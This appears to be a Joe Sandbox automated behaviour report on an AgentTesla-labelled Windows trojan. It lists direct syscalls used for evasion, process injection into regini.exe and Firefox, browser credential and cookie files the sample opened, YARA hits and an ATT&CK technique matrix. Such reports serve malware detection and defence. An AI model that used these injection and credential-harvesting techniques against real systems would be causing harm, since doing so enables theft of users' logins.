                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01526420 mov eax, dword ptr fs:[00000030h]11_2_01526420
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DA430 mov eax, dword ptr fs:[00000030h]11_2_014DA430
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A04E5 mov ecx, dword ptr fs:[00000030h]11_2_014A04E5
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155A49A mov eax, dword ptr fs:[00000030h]11_2_0155A49A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A64AB mov eax, dword ptr fs:[00000030h]11_2_014A64AB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152A4B0 mov eax, dword ptr fs:[00000030h]11_2_0152A4B0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D44B0 mov ecx, dword ptr fs:[00000030h]11_2_014D44B0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D674D mov esi, dword ptr fs:[00000030h]11_2_014D674D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D674D mov eax, dword ptr fs:[00000030h]11_2_014D674D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D674D mov eax, dword ptr fs:[00000030h]11_2_014D674D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01524755 mov eax, dword ptr fs:[00000030h]11_2_01524755
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152E75D mov eax, dword ptr fs:[00000030h]11_2_0152E75D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A0750 mov eax, dword ptr fs:[00000030h]11_2_014A0750
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2750 mov eax, dword ptr fs:[00000030h]11_2_014E2750
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E2750 mov eax, dword ptr fs:[00000030h]11_2_014E2750
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A8770 mov eax, dword ptr fs:[00000030h]11_2_014A8770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0770 mov eax, dword ptr fs:[00000030h]11_2_014B0770
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DC700 mov eax, dword ptr fs:[00000030h]11_2_014DC700
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A0710 mov eax, dword ptr fs:[00000030h]11_2_014A0710
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D0710 mov eax, dword ptr fs:[00000030h]11_2_014D0710
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151C730 mov eax, dword ptr fs:[00000030h]11_2_0151C730
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DC720 mov eax, dword ptr fs:[00000030h]11_2_014DC720
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DC720 mov eax, dword ptr fs:[00000030h]11_2_014DC720
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D273C mov eax, dword ptr fs:[00000030h]11_2_014D273C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D273C mov ecx, dword ptr fs:[00000030h]11_2_014D273C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D273C mov eax, dword ptr fs:[00000030h]11_2_014D273C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014AC7C0 mov eax, dword ptr fs:[00000030h]11_2_014AC7C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015207C3 mov eax, dword ptr fs:[00000030h]11_2_015207C3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C27ED mov eax, dword ptr fs:[00000030h]11_2_014C27ED
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C27ED mov eax, dword ptr fs:[00000030h]11_2_014C27ED
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C27ED mov eax, dword ptr fs:[00000030h]11_2_014C27ED
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A47FB mov eax, dword ptr fs:[00000030h]11_2_014A47FB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A47FB mov eax, dword ptr fs:[00000030h]11_2_014A47FB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152E7E1 mov eax, dword ptr fs:[00000030h]11_2_0152E7E1
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154678E mov eax, dword ptr fs:[00000030h]11_2_0154678E
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A07AF mov eax, dword ptr fs:[00000030h]11_2_014A07AF
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015547A0 mov eax, dword ptr fs:[00000030h]11_2_015547A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BC640 mov eax, dword ptr fs:[00000030h]11_2_014BC640
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DA660 mov eax, dword ptr fs:[00000030h]11_2_014DA660
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014DA660 mov eax, dword ptr fs:[00000030h]11_2_014DA660
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtWriteVirtualMemory: Direct from: 0x77762E3C
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtMapViewOfSection: Direct from: 0x77762D1C
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtNotifyChangeKey: Direct from: 0x77763C2C
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtCreateMutant: Direct from: 0x777635CC
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtResumeThread: Direct from: 0x777636AC
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtProtectVirtualMemory: Direct from: 0x77757B2E
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtQuerySystemInformation: Direct from: 0x77762DFC
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtAllocateVirtualMemory: Direct from: 0x77762BFC
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtReadFile: Direct from: 0x77762ADC
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtDelayExecution: Direct from: 0x77762DDC
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtWriteVirtualMemory: Direct from: 0x7776490C
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtQueryInformationProcess: Direct from: 0x77762C26
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtResumeThread: Direct from: 0x77762FBC
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtCreateUserProcess: Direct from: 0x7776371C
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtSetInformationThread: Direct from: 0x777563F9
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtAllocateVirtualMemory: Direct from: 0x77763C9C
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtSetInformationThread: Direct from: 0x77762B4C
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtQueryAttributesFile: Direct from: 0x77762E6C
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtReadVirtualMemory: Direct from: 0x77762E8C
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtCreateKey: Direct from: 0x77762C6C
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtQuerySystemInformation: Direct from: 0x777648CC
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtAllocateVirtualMemory: Direct from: 0x777648EC
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtQueryVolumeInformationFile: Direct from: 0x77762F2C
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtOpenSection: Direct from: 0x77762E0C
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtDeviceIoControlFile: Direct from: 0x77762AEC
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtAllocateVirtualMemory: Direct from: 0x77762BEC
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtQueryInformationToken: Direct from: 0x77762CAC
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtTerminateThread: Direct from: 0x77762FCC
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtCreateFile: Direct from: 0x77762FEC
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtOpenFile: Direct from: 0x77762DCC
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtOpenKeyEx: Direct from: 0x77762B9C
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtSetInformationProcess: Direct from: 0x77762C5C
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe NtProtectVirtualMemory: Direct from: 0x77762F9C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Memory written: C:\Users\user\Desktop\ZcshRk2lgh.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Section loaded: NULL target: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Section loaded: NULL target: C:\Windows\SysWOW64\regini.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: NULL target: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe protection: read write
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: NULL target: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe Thread register set: target process: 2860
                Source: C:\Windows\SysWOW64\regini.exe Thread APC queued: target process: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Process created: C:\Users\user\Desktop\ZcshRk2lgh.exe "C:\Users\user\Desktop\ZcshRk2lgh.exe"
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe Process created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: EbjRcLZjak.exe, 0000000C.00000000.1552909471.0000000001941000.00000002.00000001.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000C.00000002.3094720214.0000000001941000.00000002.00000001.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000E.00000000.1710750888.0000000001531000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: EbjRcLZjak.exe, 0000000C.00000000.1552909471.0000000001941000.00000002.00000001.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000C.00000002.3094720214.0000000001941000.00000002.00000001.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000E.00000000.1710750888.0000000001531000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: EbjRcLZjak.exe, 0000000C.00000000.1552909471.0000000001941000.00000002.00000001.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000C.00000002.3094720214.0000000001941000.00000002.00000001.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000E.00000000.1710750888.0000000001531000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: ?Program Manager
                Source: EbjRcLZjak.exe, 0000000C.00000000.1552909471.0000000001941000.00000002.00000001.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000C.00000002.3094720214.0000000001941000.00000002.00000001.00040000.00000000.sdmp, EbjRcLZjak.exe, 0000000E.00000000.1710750888.0000000001531000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe; Queries volume information: C:\Users\user\Desktop\ZcshRk2lgh.exe VolumeInformation
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match; File source: 11.2.ZcshRk2lgh.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 11.2.ZcshRk2lgh.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0000000E.00000002.3098541538.0000000005390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000D.00000002.3092740310.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000B.00000002.1633443827.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000D.00000002.3092558737.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000C.00000002.3095243481.0000000004DA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000B.00000002.1634959361.00000000036C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\regini.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\regini.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\regini.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\regini.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\regini.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\regini.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\regini.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\regini.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\regini.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match; File source: 11.2.ZcshRk2lgh.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 11.2.ZcshRk2lgh.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0000000E.00000002.3098541538.0000000005390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000D.00000002.3092740310.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000B.00000002.1631865087.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000B.00000002.1633443827.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000D.00000002.3092128109.0000000000910000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000D.00000002.3092558737.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000C.00000002.3095243481.0000000004DA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000B.00000002.1634959361.00000000036C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
                | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
                | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 113 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

                [Behavior graph, ID 1588751. Sample: ZcshRk2lgh.exe, start date: 11/01/2025, architecture: WINDOWS, score: 100. Process chain: ZcshRk2lgh.exe (started) -> ZcshRk2lgh.exe (started) -> EbjRcLZjak.exe (injected) -> regini.exe (started) -> EbjRcLZjak.exe (injected) and firefox.exe (started).]

                | Source | Detection | Scanner | Label | Link |
                |---|---|---|---|---|
                | ZcshRk2lgh.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla | |
                | ZcshRk2lgh.exe | 72% | Virustotal | | Browse |
                | ZcshRk2lgh.exe | 100% | Joe Sandbox ML | | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                                                                Joe Sandbox version: 42.0.0 Malachite
                                                                Analysis ID: 1588751
                                                                Start date and time: 2025-01-11 05:08:26 +01:00
                                                                Joe Sandbox product: CloudBasic
                                                                Overall analysis duration: 0h 9m 12s
                                                                Hypervisor based Inspection enabled: false
                                                                Report type: full
                                                                Cookbook file name: default.jbs
                                                                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Run name: Run with higher sleep bypass
                                                                Number of analysed new started processes analysed: 24
                                                                Number of new started drivers analysed: 0
                                                                Number of existing processes analysed: 0
                                                                Number of existing drivers analysed: 0
                                                                Number of injected processes analysed: 2
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode: default
                                                                Analysis stop reason: Timeout
                                                                Sample name: ZcshRk2lgh.exe (renamed because original name is a hash value)
                                                                Original Sample Name: 29f5edb28740dda7118ed53f1432f02bb5a7f809075efb5d89f90016d0eedd00.exe
                                                                Detection: MAL
                                                                Classification: mal100.troj.spyw.evad.winEXE@7/2@10/10
                                                                EGA Information:
                                                                • Successful, ratio: 75%
                                                                HCA Information:
                                                                • Successful, ratio: 90%
                                                                • Number of executed functions: 97
                                                                • Number of non-executed functions: 276
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 40.126.32.140, 40.126.32.72, 20.190.160.20, 20.190.160.22, 40.126.32.74, 40.126.32.68, 20.190.160.17, 40.126.32.138, 2.23.242.162, 13.107.246.45, 4.175.87.197, 20.109.210.53
                                                                • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, time.windows.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                • Not all processes were analyzed, report is missing behavior information
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                No simulations
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                No context
                                                                No context
                                                                Process:C:\Users\user\Desktop\ZcshRk2lgh.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1216
                                                                Entropy (8bit):5.34331486778365
                                                                Encrypted:false
